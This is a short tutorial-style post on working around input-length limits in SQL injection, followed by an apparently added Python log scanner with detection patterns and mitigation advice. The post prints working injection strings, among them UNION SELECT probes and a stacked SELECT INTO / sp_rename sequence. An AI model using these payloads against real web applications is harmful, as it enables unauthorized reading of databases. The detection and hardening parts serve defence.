Input Length restriction in SQL Injections

Often, while exploiting SQL injections, one encounters restrictions on the length of input a vulnerable parameter can take, e.g.:

  • myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,@@version-- (works)
  • myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,table_name from information_schema.tables-- (may not work: too long)

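One solution to this problem is to split the work across several shorter requests, staging the data in a table with a short name and renaming its column: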

  • myhost/vuln.asp?vuln=a';select * into xx from information_schema.tables--
  • myhost/vuln.asp?vuln=a';exec sp_rename 'xx.table_name','xx.tn'--
  • myhost/vuln.asp?vuln=a'union all select 1,2,3,4,5,6,tn from xx--

Thanks to Ferruh for the help.
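
For reviewing web logs for the three-request sequence above, here is an added example (not code from the original post) that flags stacked statements, SELECT ... INTO, sp_rename and UNION SELECT in decoded query-string values, and reports clients that both staged a helper table and read it back. The log format, function names and sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures for the statement shapes in the three requests above.
RULES = {
    "stacked_statement": re.compile(r"'\s*;\s*(select|exec(ute)?)\b", re.I),
    "select_into": re.compile(r"\bselect\b.+?\binto\s+\w+\s+from\b", re.I | re.S),
    "sp_rename": re.compile(r"\bsp_rename\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

def scan_query(query):
    """Return the sorted rule names matched by any decoded parameter value."""
    hits = set()
    for pair in query.split("&"):
        _, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # decode %27, %3B, '+' before matching
        hits.update(name for name, rx in RULES.items() if rx.search(value))
    return sorted(hits)

def staged_clients(log_lines):
    """Clients that wrote a helper object (SELECT INTO / sp_rename)
    and also sent a UNION SELECT read."""
    seen = defaultdict(set)
    for line in log_lines:
        client, _, target = line.partition(" ")
        _, _, query = target.partition("?")
        seen[client].update(scan_query(query))
    return sorted(c for c, r in seen.items()
                  if r & {"select_into", "sp_rename"} and "union_select" in r)

# Constructed sample log: "<client-ip> <request-target>", not real traffic.
SAMPLE_LOG = [
    "203.0.113.7 /vuln.asp?vuln=a%27%3Bselect+*+into+xx+from+information_schema.tables--",
    "203.0.113.7 /vuln.asp?vuln=a%27%3Bexec+sp_rename+%27xx.table_name%27%2C%27xx.tn%27--",
    "203.0.113.7 /vuln.asp?vuln=a%27union+all+select+1%2C2%2C3%2C4%2C5%2C6%2Ctn+from+xx--",
    "198.51.100.4 /vuln.asp?vuln=union+membership+renewal",
    "198.51.100.9 /search.asp?q=select+a+plan%3B+compare",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(line.split(" ")[0], scan_query(line.partition("?")[2]))
    print("staged:", staged_clients(SAMPLE_LOG))
```

Pattern matching on logs is a detection aid only: the sequence depends on the application's database login being able to run stacked statements that create and alter tables, so parameterized queries and a login without CREATE TABLE or ALTER rights remove the condition it relies on.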